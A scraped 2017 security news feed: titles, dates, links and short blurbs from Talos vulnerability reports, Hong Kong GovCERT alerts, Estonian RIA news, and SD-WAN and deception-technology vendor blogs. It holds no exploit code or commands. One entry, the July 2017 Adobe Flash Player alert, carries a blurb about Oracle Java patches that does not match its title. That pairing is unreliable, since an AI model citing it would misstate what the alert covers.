2017-10-10T00:00:00Z | 1507593600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0395
Simple DirectMedia Layer SDL_image XCF Property Handling Code Execution Vulnerability
2017-10-10T00:00:00Z | 1507593600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0394
TMC, Layer123 Recognize Cato for SD-WAN Leadership
2017-10-09T11:30:29Z | 1507548629

TMC, a global, integrated media company, has awarded Cato Cloud a 2017 Internet Telephony SD-WAN Excellence Award. The award is given to companies that demonstrate the innovation, vision, and execution to deliver software-based networking tools to support different and unique communities of interest. “Congratulations to Cato Networks for receiving a 2017 INTERNET TELEPHONY SD-WAN Excellence... The post TMC, Layer123 Recognize Cato for SD-WAN Leadership appeared first on Cato Networks.

https://www.catonetworks.com/blog/tmc-layer123-recognize-cato-for-sd-wan-leadership/
The 4 Drivers in the Journey to Full WAN Transformation
2017-10-09T08:16:17Z | 1507536977

Organizations around the world are beginning to go through digital transformation projects. They are moving their datacenters to the cloud, using more and more SaaS products, and moving their networking (SD-WAN) and security (FWaaS) to cloud-based solutions. The 4 Mega Drivers of Business Profitability is always the driving factor for business. But in today’s hypercompetitive... The post The 4 Drivers in the Journey to Full WAN Transformation appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-4-drivers-in-the-journey-to-full-wan-transformation/
Security Alert (A17-10-01): Multiple Vulnerabilities in IBM Notes and Domino
2017-10-04T04:00:00Z | 1507089600

Multiple vulnerabilities are found in IBM Notes and Domino. The bundled Java virtual machine (JVM) is susceptible to different attacks.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-10-02): Multiple Vulnerabilities in Dnsmasq
2017-10-04T04:00:00Z | 1507089600

Multiple vulnerabilities are found in the Dnsmasq software package. Reports indicate that the proof-of-concept exploit code is available on the Internet.

https://www.govcert.gov.hk/en/alerts_detail.php
Computerinsel Photoline GIF Parsing Code Execution Vulnerability
2017-10-04T00:00:00Z | 1507075200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0387
Computerinsel Photoline TGA Parsing Code Execution Vulnerability
2017-10-04T00:00:00Z | 1507075200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0458
Computerinsel Photoline SVG Parsing Code Execution Vulnerability
2017-10-04T00:00:00Z | 1507075200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0427
Oktoober on Euroopa küberturvalisuse kuu
2017-10-02T21:00:00Z | 1506978000

Oktoober on üleeuroopaline küberturvalisuse kuu, mille raames korraldavad pea kõik ELi riigid küberturbega seotud üritusi, eesmärgiks juhtida tähelepanu turvalisele käitumisele digimaailmas.

https://ria.ee/uudised/oktoober-euroopa-kuberturvalisuse-kuu
Transitioning to SD-WANs: Problems to Avoid
2017-10-02T14:01:22Z | 1506952882

WAN Transformation: SD-WAN Cost and ROI Analysis It’s no secret that traditional wide area networks (WANs) have to change. Much has been made about their high costs, long-time to deploy, and poor fit for running Internet and cloud traffic. But cost reductions, in particular, that are often promised with the successor to traditional WANs, software-defined... The post Transitioning to SD-WANs: Problems to Avoid appeared first on Cato Networks.

https://www.catonetworks.com/blog/transitioning-to-sd-wans-problems-to-avoid/
Security Alert (A17-09-10): Multiple Vulnerabilities in Firefox
2017-09-29T04:00:00Z | 1506657600

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
The Case for Replacing MPLS with Cloud-based SD-WAN: A Customer Story
2017-09-28T14:00:00Z | 1506607200

One of the great things about Cato Cloud is its ability to simplify environments. By implementing an MPLS alternative, an SLA-backed WAN and by eliminating the stacks of security appliances, bandwidth costs drop and operations become more efficient. It’s a story I’ve heard from so many customers in one way or another, most recently from... The post The Case for Replacing MPLS with Cloud-based SD-WAN: A Customer Story appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-case-for-replacing-mpls-with-cloud-based-sd-wan-a-customer-story/
Security Alert (A17-09-08): Multiple Vulnerabilities in Cisco Products
2017-09-28T04:00:00Z | 1506571200

Cisco has released the security advisories to address the vulnerabilities in Cisco IOS and IOS XE software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-09-09): Vulnerability in Linux Kernel
2017-09-28T04:00:00Z | 1506571200

A vulnerability was found in the memory management of the affected Linux operating systems.

https://www.govcert.gov.hk/en/alerts_detail.php
How Secure is Your SD-WAN?
2017-09-27T14:13:42Z | 1506521622

The market for SD-WAN has been driven in part by its ability to reduce bandwidth costs and improve the performance of cloud access. These drivers, though, also come with baggage: the reassessment of today’s corporate security model. Traditionally, Wide Area Networks (WANs) and network security were loosely coupled entities. Networking teams focussed on the connectivity... The post How Secure is Your SD-WAN? appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-secure-is-your-sd-wan/
Security Alert (A17-09-06): Multiple Vulnerabilities in Apple iOS
2017-09-27T04:00:00Z | 1506484800

Apple has released software update fixing 62 vulnerabilities in iOS versions prior to iOS 11.0.1.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-09-07): Multiple Vulnerabilities in Broadcom Wireless Chipset
2017-09-27T04:00:00Z | 1506484800

Multiple vulnerabilities are found in Apple and Android devices built upon Broadcom BCM4355C0 model of wireless chipset.

https://www.govcert.gov.hk/en/alerts_detail.php
Turvariskiga ID-kaarte saab uuendama hakata novembris
2017-09-26T21:00:00Z | 1506459600

Riigi Infosüsteemi Ameti eestvedamisel on välja töötatud tarkvara, mille abil saab turvariskiga ID-kaartide, elamisloa ja digi-ID elektroonilist osa uuendada alates novembrist.

https://ria.ee/uudised/turvariskiga-id-kaarte-saab-uuendama-hakata-novembris
Riiklik küberüksus CERT-EE on maailma parimate hulgas
2017-09-24T21:00:00Z | 1506286800

Riigi Infosüsteemi Ameti küberintsidentide käsitlemise osakond ehk CERT-EE sai sertifitseerimistunnistuse, millega kuulub nüüd maailma kuue tunnustatuima riikliku küberüksuse hulka.

https://ria.ee/uudised/riiklik-kuberuksus-cert-ee-maailma-parimate-hulgas
Introduction to DNS Data Exfiltration
2017-09-21T04:00:00Z | 1505966400

Written by Asaf Nadler and Avi Aminov Updated 2/14/19 After the initial publication of this blog post, Asaf Nadler and Avi Aminov wrote a paper on the detection of malicious and low throughput data exfiltration over the DNS protocol. The...

https://www.akamai.com/blog/news/introduction-to-dns-data-exfiltration
Open Source Honeypots That Detect Threats For Free
2017-09-20T12:18:42Z | 1505909922

If you’re a target for either financially motivated cyber-criminals, or nation-state grade attackers, chances are your security team feels outgunned. Deception technology excels at detecting these attacks by shifting the cognitive, economic and time costs of the attack back onto the attacker.

https://www.smokescreen.io/practical-honeypots-a-list-of-open-source-deception-tools-that-detect-threats-for-free/
Sun Rich: A Lesson in the Benefits of a Fully Converged WAN
2017-09-19T19:26:28Z | 1505849188

Fast-growing companies have a nasty habit of accumulating “networking stuff” that ultimately brings complexity and complications to the lives of IT.  Just ask Adam Laing, the systems administrator at Sun Rich, a fresh produce provider to foodservice and retails markets throughout North America. Laing found himself managing the headaches of rapid growth. An MPLS network... The post Sun Rich: A Lesson in the Benefits of a Fully Converged WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/sun-rich-a-lesson-in-the-benefits-of-a-fully-converged-wan/
7 Ways to Fail At Implementing Deception Technology
2017-09-18T14:01:05Z | 1505743265

Since there’s precious little information on how security teams can make deception implementations successful (some folks like to keep it a secret), there’s plenty that can go wrong. Here are 7 ways to completely botch your deployment of deception technology.

https://www.smokescreen.io/7-deadly-sins-how-to-fail-at-implementing-deception-technology/
10 Questions To Ask Deception Technology Vendors
2017-09-18T12:58:47Z | 1505739527

Deception technology is a major buzzword today. In order for you to cut through the marketing hype, here’s a set of evaluation questions that will help you better understand disparate deception offerings and identify vendors that know what they’re doing.

https://www.smokescreen.io/10-questions-to-ask-your-deception-technology-provider/
The Future of Work and its Effect on Cybersecurity
2017-09-18T05:35:12Z | 1505712912

The future of work is about flexibility. Employees are demanding more remote working options, increased ability to work on the devices they choose, and even contingency work that creates mobile lifestyle. Smart employers, seeking to win the battle for talent, are adjusting course to comply. And those who don’t, are facing another factor of the... The post The Future of Work and its Effect on Cybersecurity appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-future-of-work-and-its-effect-on-cybersecurity/
In Defence of Signatures – They Don’t Suck
2017-09-15T19:09:27Z | 1505502567

Signatures take a beating in most conversations in security. What, if anything, are they actually good for, then? Team Smokescreen stands up for the rights of the humble signature, explaining why they’re misapplied and how to better use them for defence

https://www.smokescreen.io/signatures-rock-defending-a-cybersecurity-whipping-boy/
ansible-vault Yaml Load Code Execution Vulnerability
2017-09-14T00:00:00Z | 1505347200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0305
RIA juht ning IT-asekantsler: küberturvalisus nõuab piirideta koostööd
2017-09-13T21:00:00Z | 1505336400

Täna ja homme arutavad Euroopa tippspetsialistid küberkonverentsil „Digitaalne ühisturg, ühine digitaalne turvalisus“ selle üle, kuidas tõhusamalt kaitsta inimesi küberkurjategijate eest. Konverentsil arutletakse küberkaitse võimekuse, rahvusvahelise koostöö ja seadusloome tõhustamise üle.

https://ria.ee/uudised/ria-juht-ning-it-asekantsler-kuberturvalisus-nouab-piirideta-koostood
Choosing an SD-WAN Architecture for Real-Time Communications
2017-09-13T14:21:18Z | 1505312478

While there are many considerations when choosing an SD-WAN, real-time traffic presents its own set of challenges. Besides the general sensitivity to loss and latency, the widespread adoption of Unified Communications as a Service (UCaaS) makes well-performing cloud connections as important (if not more important) than site-to-site connections. Let’s take a look at the considerations... The post Choosing an SD-WAN Architecture for Real-Time Communications appeared first on Cato Networks.

https://www.catonetworks.com/blog/choosing-an-sd-wan-architecture-for-real-time-communications/
What is SD-WAN and can it transform enterprise networking?
2017-09-13T09:11:50Z | 1505293910

The WAN is evolving after years of stagnation, and SD-WAN is all the rage. What is the promise driving SD-WAN? In short, SD-WAN aims to remove the constraints of legacy connectivity technologies, namely MPLS and the unmanaged public Internet, ushering a new age of flexible, resilient and secure networks. Network Constraints Make for IT Constraints... The post What is SD-WAN and can it transform enterprise networking? appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-is-sd-wan-and-can-it-transform-enterprise-networking/
Security Alert (A17-09-03): Multiple Vulnerabilities in Microsoft Products (September 2017)
2017-09-13T04:00:00Z | 1505275200

Microsoft has released 80 security updates addressing multiple vulnerabilities which affect several Microsoft products or components and one of them enhancing the security as a defense in depth measure. Exploitation has been reported in the wild.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-09-04): Multiple Vulnerabilities in Adobe Flash Player
2017-09-13T04:00:00Z | 1505275200

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by memory corruption.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-09-05): Multiple Vulnerabilities in Bluetooth Implementation
2017-09-13T04:00:00Z | 1505275200

8 vulnerabilities, collectively named as “BlueBorne”, are found in the implementation of the Bluetooth protocol in different platforms. An attacker could exploit these vulnerabilities through Bluetooth connections without devices paired in advance.

https://www.govcert.gov.hk/en/alerts_detail.php
LibOFX Tag Parsing Code Execution Vulnerability
2017-09-13T00:00:00Z | 1505260800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0317
When Looking for SWIFT Audit Guidelines, Beware of the Customer Security Controls Framework
2017-09-12T18:37:00Z | 1505241420

https://www.akamai.com/blog/security/beware-swift-customer-security-controls-framework
ID-kaardi turvariskile on leitud võimalik lahendus
2017-09-11T21:00:00Z | 1505163600

Riigi Infosüsteemi Amet (RIA) ning Politsei- ja Piirivalveamet (PPA) töötavad välja lahendust, mille abil uuendada 750 000 ID-kaarti, mille kiibil on turvarisk.

https://ria.ee/uudised/id-kaardi-turvariskile-leitud-voimalik-lahendus
AdRoll: How to Improve Contractor Management and Mobile Access to the Cloud
2017-09-11T08:16:00Z | 1505117760

Customer Case Study As companies embrace contractors and the “gig economy,” IT professionals need to reconsider their approach to mobility and access. Providing outside contractors with mobile access presents a range of IT challenges. Processes need to be put into place for quickly provisioning remote users. Accommodations must be made for devices IT cannot vet... The post AdRoll: How to Improve Contractor Management and Mobile Access to the Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/adroll-how-to-improve-contractor-management-and-cloud-access/
FreeXL read_biff_next_record Code Execution Vulnerability
2017-09-11T00:00:00Z | 1505088000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0430
FreeXL BIFF Dimension Marker Code Execution Vulnerability
2017-09-11T00:00:00Z | 1505088000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0431
Simplifying your Office 365 Deployment with Cato
2017-09-06T12:56:39Z | 1504702599

If your company is like a lot of companies we see, you’re probably using or considering Microsoft Office 365. According to Gartner research, most companies who’ve deployed Office 365 are happy with the application, though a significant number cite networking-related issues as sources of technical problems   Latency can be too high for some Office... The post Simplifying your Office 365 Deployment with Cato appeared first on Cato Networks.

https://www.catonetworks.com/blog/simplifying-your-office-365-deployment-with-cato/
Security Alert (A17-09-02): Vulnerabilities in Apache Struts
2017-09-06T04:00:00Z | 1504670400

Apache has released a new version of Apache Struts with fixes for multiple vulnerabilities. Reports indicate that the vulnerability mentioned in S2-052 allows an attacker to perform arbitrary code execution through special crafted XML requests.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft Edge Content Security Bypass Vulnerability
2017-09-06T00:00:00Z | 1504656000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0306
ID-kaardi kiibis avastati turvarisk
2017-09-04T21:00:00Z | 1504558800

30. augustil informeeris rahvusvaheline teadlaste grupp Riigi Infosüsteemi Ametit (RIA), et nad avastasid turvariski, mis mõjutab Eestis alates 2014. aasta oktoobrist välja antud ID-kaarte.

https://ria.ee/uudised/id-kaardi-kiibis-avastati-turvarisk
Security Alert (A17-09-01): Multiple Vulnerabilities in IBM Notes
2017-09-01T04:00:00Z | 1504238400

Multiple vulnerabilities are found in IBM Lotus Notes related to open source libraries and program flaws.

https://www.govcert.gov.hk/en/alerts_detail.php
Järgmisest nädalast ei saa uuendamata ID-kaarte Google Chrome'i veebibrauseriga kasutada
2017-08-30T21:00:00Z | 1504126800

5. septembrist ei saa Google Chrome'i uue veebibrauseri versiooniga enam isikutuvastamiseks ja digiallkirjastamiseks kasutada ID- ja elamisloakaarte, mille sertifikaadid on uuendamata.

https://ria.ee/uudised/jargmisest-nadalast-ei-saa-uuendamata-id-kaarte-google-chromei-veebibrauseriga-kasutada
Gdk-Pixbuf TIFF tiff_image_parse Code Execution Vulnerability
2017-08-30T00:00:00Z | 1504051200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0377
Ledger CLI Tags Parsing Code Execution Vulnerability
2017-08-30T00:00:00Z | 1504051200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0303
Gdk-Pixbuf JPEG gdk_pixbuf__jpeg_image_load_increment Code Execution Vulnerability
2017-08-30T00:00:00Z | 1504051200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0366
Ledger CLI Account Directive Use-After-Free Vulnerability
2017-08-30T00:00:00Z | 1504051200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0304
National Instruments LabVIEW RSRC Arbitrary Null Write Code Execution Vulnerability
2017-08-29T00:00:00Z | 1503964800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0273
The WireX Botnet: An Example of Cross-Organizational Cooperation
2017-08-28T12:05:00Z | 1503921900

On August 17th, 2017, multiple Content Delivery Networks (CDNs) and content providers were subject to significant attacks from a botnet dubbed WireX. The botnet is named for an anagram for one of the delimiter strings in its command and control protocol. The WireX botnet comprises primarily Android devices running malicious applications and is designed to create DDoS traffic. The botnet is sometimes associated with ransom notes to targets.

https://www.akamai.com/blog/security/example-of-cross-organizational-cooperation
Lexmark Perceptive Document Filters PDF GfxFont Code Execution Vulnerability
2017-08-28T00:00:00Z | 1503878400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0322
Lexmark LibISYSpdf Image Rendering DCTStream::getBlock() Code Execution Vulnerability
2017-08-28T00:00:00Z | 1503878400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0323
Battle of the Global Backbones: What are Your Options?
2017-08-21T14:32:42Z | 1503325962

Globalization is driving enterprises of all sizes to expand internationally. Manufacturers create new facilities in Asia and Latin America and, more specifically, in China, behind the Great Firewall of China. Engineering firms need to extend corporate applications to their field personnel in temporary project sites. Retailers expand regionally to new countries where they have no... The post Battle of the Global Backbones: What are Your Options? appeared first on Cato Networks.

https://www.catonetworks.com/blog/battle-of-the-global-backbones-what-are-your-options/
Why Global SD-WAN powered by IP Transit Backbone is Perfect for the Post-MPLS Era
2017-08-17T13:34:53Z | 1502976893

The Search for Affordable MPLS Alternative Global organizations are looking for SD-WAN services to provide an affordable, MPLS alternative. If you are already using MPLS, you are well aware of its challenges: high costs, rigidity, long time to deploy and incompatibility with the growing demand for direct cloud and internet access. For a long time,... The post Why Global SD-WAN powered by IP Transit Backbone is Perfect for the Post-MPLS Era appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-global-sd-wan-powered-by-ip-transit-backbone-is-perfect-for-the-post-mpls-era/
FIRST releases Policy for Standards Development
2017-08-15T13:00:00Z | 1502802000

The Forum of Incident Response and Security Teams has published a formal policy to guide cyber security standardization within its standards groups.

https://www.first.org/newsroom/releases/20170815
SD-WAN vs. MPLS: Choose the best WAN solution for you
2017-08-15T07:19:55Z | 1502781595

Unless you were living under a rock, you probably heard about SD-WAN and its promise to transform enterprise networking as we know it. And, by enterprise networking we mean the use of MPLS at the core of enterprise networks. So, to SD-WAN or to MPLS? Here is what you need to consider. MPLS Pros and... The post SD-WAN vs. MPLS: Choose the best WAN solution for you appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-vs-mpls-choose-the-best-wan-solution-for-you/
CERT-EE hoiatab: Hoogustunud on tegevjuhi petuskeem ehk finantsjuhile saadetavad kirjad
2017-08-14T21:00:00Z | 1502744400

Tegevjuhi pettus ehk CEO pettus seisneb näiliselt tegevjuhi nime alt, vahel isegi “tema” meiliaadressilt, kirjade saatmises kas ettevõtte finantsjuhile või raamatupidajale (või töötajale, kes kodulehe andmetel võib olla seotud maksete tegemisega).

https://ria.ee/uudised/cert-ee-hoiatab-hoogustunud-tegevjuhi-petuskeem-ehk-finantsjuhile-saadetavad-kirjad
Miks ei ole mõistlik kõiki teenuseid interneti teel kättesaadavana hoida?
2017-08-10T21:00:00Z | 1502398800

Riigi Infosüsteemi Ameti (RIA) küberturvalisuse teenistuse seire tulemusena selgus, et tavakasutajad ja võrguhaldurid ei pööra piisavalt tähelepanu küberrünnakutele avatud teenuste turvalisuse tagamisele.

https://ria.ee/uudised/miks-ei-ole-moistlik-koiki-teenuseid-interneti-teel-kattesaadavana-hoida
The SD-WAN Buyer Collection: EBooks and the Guru Test for Building Tomorrow’s Backbone, Today
2017-08-10T12:18:30Z | 1502367510

So you’ve decided to get off your MPLS service, but “To what?” is the question. What are the issues to consider when re-evaluating MPLS – and its successor? To answer those and other questions, we’ve put together an ebook extravaganza, packed with helpful tips and insights. Think you’ve mastered SD-WAN? Take the Cato Quiz and... The post The SD-WAN Buyer Collection: EBooks and the Guru Test for Building Tomorrow’s Backbone, Today appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-sd-wan-buyer-collection-ebooks-and-the-guru-test-for-building-tomorrows-backbone-today/
GNOME libsoup HTTP Chunked Encoding Remote Code Execution Vulnerability
2017-08-10T00:00:00Z | 1502323200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0392
Security Alert (A17-08-01): Multiple Vulnerabilities in Microsoft Products (August 2017)
2017-08-09T04:00:00Z | 1502251200

Microsoft has released 31 security updates addressing multiple vulnerabilities which affect several Microsoft products or components. There is elevated risk of cyber attacks for the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-08-02): Multiple Vulnerabilities in IBM Notes and Domino
2017-08-09T04:00:00Z | 1502251200

Multiple vulnerabilities are found in IBM Notes and Domino. The bundled Java virtual machine (JVM) is susceptible to different attacks which could be remotely exploited without authentication.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-08-03): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2017-08-09T04:00:00Z | 1502251200

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities caused by security bypass, type confusion, memory corruption, use-after-free error, insufficient verification of data authenticity and heap overflow.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-08-04): Multiple Vulnerabilities in Firefox
2017-08-09T04:00:00Z | 1502251200

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox. These vulnerabilities are caused by XUL injection, use-after-free error, memory safety bugs, buffer overflow, out-of-bounds read, domain hijacking, same-origin policy bypass, and memory protections bypass, etc.

https://www.govcert.gov.hk/en/alerts_detail.php
Adobe Acrobat Reader DC AcroForm PDFDocEncoding Remote Code Execution Vulnerability
2017-08-08T00:00:00Z | 1502150400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0361
Kakadu SDK JPEG 2000 Unknown Marker Code Execution Vulnerability
2017-08-04T00:00:00Z | 1501804800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0308
Kakadu SDK JPEG 2000 Contiguous Codestream Code Execution Vulnerability
2017-08-04T00:00:00Z | 1501804800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0309
How I gained access to chef, docker, AWS, and MongoDB instances in a single request
2017-08-03T00:00:00Z | 1501718400

The following article details the successful exploitation of a server sided request forgery vulnerability in Yahoo's small business platform.

https://samcurry.net/how-i-gained-access-to-chef-docker-aws-and-mongodb-instances-in-a-single-request
Microsoft didn’t sandbox Windows Defender, so I did
2017-08-02T10:50:55Z | 1501671055

Microsoft exposed their users to a lot of risks when they released Windows Defender without a sandbox. This surprised me. Sandboxing is one of the most effective security-hardening techniques. Why did Microsoft sandbox other high-value attack surfaces such as the JIT code in Microsoft Edge, but leave Windows Defender undefended? As a proof of concept, […]

https://blog.trailofbits.com/2017/08/02/microsoft-didnt-sandbox-windows-defender-so-i-did/
EZB Systems UltraISO ISO Parsing Code Execution Vulnerability
2017-08-01T00:00:00Z | 1501545600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0342
Cato Adds IPS as a Service with Context-Aware Protection to Cato SD-WAN
2017-07-31T15:04:07Z | 1501513447

Cato SD-WAN is First to Converge Global Networking and Advanced Security Services Cato introduced today a context-aware Intrusion Prevention System (IPS) as part of its Cato Cloud secure SD-WAN service. Cato’s cloud-based IPS is fully converged with the rest of Cato’s security services, which include next generation firewall (NGFW), secure web gateway (SWG), URL filtering,... The post Cato Adds IPS as a Service with Context-Aware Protection to Cato SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-adds-ips-as-a-service-with-context-aware-protection-to-cato-sd-wan/
An extra bit of analysis for Clemency
2017-07-30T22:41:30Z | 1501454490

This year’s DEF CON CTF used a unique hardware architecture, cLEMENCy, and only released a specification and reference tooling for it 24 hours before the final event began. cLEMENCy was purposefully designed to break existing tools and make writing new ones harder. This presented a formidable challenge given the timeboxed competition occurs over a single […]

https://blog.trailofbits.com/2017/07/30/an-extra-bit-of-analysis-for-clemency/
DDOC-formaadis digiallkirjastatud dokumendid tuleks üle tembeldada
2017-07-30T21:00:00Z | 1501448400

Kui Sinul või Sinu ettevõttel on enne 2014. aastat digitaalselt allkirjastatud dokumente (ddoc-formaadis), tuleks need hiljemalt järgmise aasta juuliks üle tembeldada. Ajatempli lisamine viib need dokumendid vastavusse tänapäeva turvanõuetele ning tagab selle, et dokumente ei ole võimalik tulevikus muuta.

https://ria.ee/uudised/ddoc-formaadis-digiallkirjastatud-dokumendid-tuleks-ule-tembeldada
FIRST releases inaugural annual report
2017-07-24T15:00:00Z | 1500908400

The Forum of Incident Response and Security Teams releases inaugural annual report, covering the scope of its activities from the 2016 conference in Seoul, through its 2017 annual event in Puerto Rico.

https://www.first.org/newsroom/releases/20170724
Join The SD-WAN Summer School
2017-07-24T13:14:11Z | 1500902051

Ahhh, the summer. Suntans, beachballs, and leisurely boardwalk strolls. Sound like fun, but don’t let the summer joy get the better of you. Keep your edge by beefing up your SD-WAN knowledge. Over the next month or so, we’ve put together a jam-packed schedule of SD-WAN webinars to help combat the tech fatigue of the... The post Join The SD-WAN Summer School appeared first on Cato Networks.

https://www.catonetworks.com/blog/join-the-sd-wan-summer-school/
Security Alert (A17-07-06): Multiple Vulnerabilities in Apple iOS
2017-07-24T04:00:00Z | 1500868800

Apple has released software update fixing 47 vulnerabilities in iOS versions prior to iOS 10.3.3. These vulnerabilities are caused by the problems in various iOS components.

https://www.govcert.gov.hk/en/alerts_detail.php
FreeRDP Rdp Client License Read Product Info Denial of Service Vulnerability
2017-07-24T00:00:00Z | 1500854400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0340
FreeRDP Rdp Client GCC Read Server Security Data Denial of Service Vulnerability
2017-07-24T00:00:00Z | 1500854400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0339
FreeRDP Rdp Client License Recv Code Execution Vulnerability
2017-07-24T00:00:00Z | 1500854400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0336
FreeRDP Rdp Client Recv RDP Code Execution Vulnerability
2017-07-24T00:00:00Z | 1500854400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0337
FreeRDP Rdp Client License Read Challenge Packet Denial of Service Vulnerability
2017-07-24T00:00:00Z | 1500854400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0341
FreeRDP Rdp Client Read Server Proprietary Certificate Denial of Service Vulnerability
2017-07-24T00:00:00Z | 1500854400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0338
A leopard can’t change its spots: Why physical security appliances can’t move to the cloud
2017-07-23T06:41:43Z | 1500792103

Palo Alto’s recent introduction of its firewall as a service (FWaaS), GlobalProtect Cloud Service, is the latest example of how firewall appliance vendors are moving to the cloud. Appliances are not aligned with the new shape of business that involves private and public cloud platforms and a mobile workforce needing fast access to business data... The post A leopard can’t change its spots: Why physical security appliances can’t move to the cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/a-leopard-cant-change-its-spots-why-physical-security-appliances-cant-move-to-the-cloud/
Corel PHOTO-PAINT X8 GIF Filter Code Execution Vulnerability
2017-07-20T00:00:00Z | 1500508800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0244
Corel CorelDRAW X8 EMF Parser Code Execution Vulnerability
2017-07-20T00:00:00Z | 1500508800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0261
Corel PHOTO-PAINT X8 TIFF Filter Code Execution Vulnerability
2017-07-20T00:00:00Z | 1500508800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0298
Corel PHOTO-PAINT X8 64-bit TIFF Filter Code Execution Vulnerability
2017-07-20T00:00:00Z | 1500508800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0297
How to Overcome Internet Problems with Cato’s Secure and Optimized SD-WAN Service
2017-07-19T10:00:44Z | 1500458444

Let’s face it, MPLS for all of its high costs and long deployment times, did one thing right – it worked. You knew that the MPLS provider was going to engineer a network that could reach from Mumbai to Houston and work day-in-and-day-out. The same can’t be said though for the public Internet. The Internet... The post How to Overcome Internet Problems with Cato’s Secure and Optimized SD-WAN Service appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-overcome-internet-problems-with-catos-secure-and-optimized-sd-wan-service/
Security Alert (A17-07-05): Multiple Vulnerabilities in Oracle Java and Oracle Products (July 2017)
2017-07-19T04:00:00Z | 1500436800

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Information Builders WebFOCUS Business Intelligence Portal Command Execution Vulnerability
2017-07-19T00:00:00Z | 1500422400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0315
ProcessMaker Enterprise Core Code Execution Vulnerability
2017-07-19T00:00:00Z | 1500422400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0314
ProcessMaker Enterprise Core Multiple SQL Injection Vulnerabilities
2017-07-19T00:00:00Z | 1500422400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0313
Open Fire User Import Export Plugin XML External Entity Injection
2017-07-19T00:00:00Z | 1500422400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0316
The MacGyver Experience: How Improvising with Cato Avoided Downtime
2017-07-12T07:01:34Z | 1499842894

Backhoe operators, floods, fires – everyone has a horror story for when one of their offices went dark. In the days of MPLS, there wasn’t much you could do when a service failed. Internet failover is a great idea, but only if you had thought about it ahead of time. Otherwise, an outage often meant... The post The MacGyver Experience: How Improvising with Cato Avoided Downtime appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-macgyver-experience-how-improvising-with-cato-avoided-downtime/
Security Alert (A17-07-03): Multiple Vulnerabilities in Microsoft Products (July 2017)
2017-07-12T04:00:00Z | 1499832000

Microsoft has released 59 security updates addressing multiple vulnerabilities which affect several Microsoft products or components and one of them referring to previous security bulletins which have undergone a major revision increment.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-07-04): Multiple Vulnerabilities in Adobe Flash Player
2017-07-12T04:00:00Z | 1499832000

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
FIRST and APNIC sign agreement to improve incident response capability in Asia Pacific
2017-07-11T11:00:00Z | 1499770800

Memorandum of Understanding enables both organizations to benefit from each other’s programs to support computer security incident response teams (CSIRT) in the region.

https://www.first.org/newsroom/releases/20170711
Iceni Infix PDF parsing SetSize Code Execution Vulnerability
2017-07-11T00:00:00Z | 1499731200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0367
